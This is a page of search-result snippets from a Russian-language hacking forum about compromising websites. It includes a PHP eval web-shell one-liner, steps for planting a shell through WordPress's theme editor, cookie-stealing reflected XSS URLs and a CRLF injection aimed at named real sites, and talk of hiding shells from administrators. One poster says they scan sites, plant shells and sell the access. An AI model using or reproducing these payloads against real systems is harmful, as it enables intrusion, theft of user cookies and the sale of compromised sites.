Search Results

Если нет мощного железа, а ПК с обычными характеристиками, хорошо подходят радужки. На mysql есть уже сгенерированные. Вот статью писал...

Ты надеюсь не пихал в середину скрипта <?php ... ?>?) Можно не только в начало, если хочешь между строк, <?php и ?> надо убрать) А вообще, есть...

Вставляешь в нужный тебе PHP-шник выполнение кода: <?php eval($_GET[cmd]); ?> Далее: site.ru/example.php?cmd=$url =...

Прочитал статью от Flopp1Ka по монетизации шелла, за что ему большой респект) Т.к денег купить все готовое за 4к у меня нету, буду крутиться как...

Странно, а что сложного в заливке шелла на WP? Берешь заходишь в -> Внешний Вид -> Редактор -> 404.php и туда пихаешь код шелла, заливаешься в...

XSS-reflected: http://volia.com/ukr/subscribe/order/?pro=cine_plus_vip%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E HTTP Parametr...

Сканер влепил так, я запрос скопировал и запостил. А профит прост как пять пальцев, выбираю сайты, сканю их, в некоторые заливаю шеллы и продаю. А...

Хм.. спасибо, учту.

Да, сканером) Лень что-то менять, я сразу как что то нахожу сюда сливаю.

Никак, я не говорил что так можно. Просто смысл пихать его в существующий JS? Если спалят, то найдут везде где б не спрятал.

Зачем пихать его в JS'ник если есть путь проще. Насчет курла, идея бредовая, т.к curl отправляет запросы от имени серва, а не клиента.

XSS-reflected: http://www.blagaya.ru/?s=1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.lastmodified%29%3C/ScRiPt%3E

Сканер не лучший, слышал пару раз о нём, теперь точно убедился что ничего хорошего от него ждать не стоит. 1) Password Transmitted over HTTP -...

Не совсем... Зарыть я его и так могу, я просто в глубь какого-нить PHP'шника засовываю и радуюсь) Но админы палят, именно палевно то что браузер...

Хммм... А если сделать ajax запрос на локальный php'пишник, а он в свою очередь будет курлить другой сайт, браузер это покажет?

Доброго времени суток уважаемые античатовцы. На днях писал тему, там объяснили что поставленную мне задачу можно выполнить Ajax'ом. Честно говоря,...

CRLF-inj (Результат отображается в heade'ре). http://www.notomania.ru/cat_view.php?id=%0d%0a%20SomeCustomInjectedHeader:injected_by_ANTICHAT

Есть Blind'овая скуля, проверил права -- ROOT. Нашел phpinfo, оттуда взял путь, нашел врайтабельную папку, вроде как все норм. Кручу sqlmap'ом ибо...

Возникла необходимость скрытой отправки GET/POST запросов. Есть JS скрипт: <script language='JavaScript' src='http://site.ru/'></script> Нет бы...

XSS:...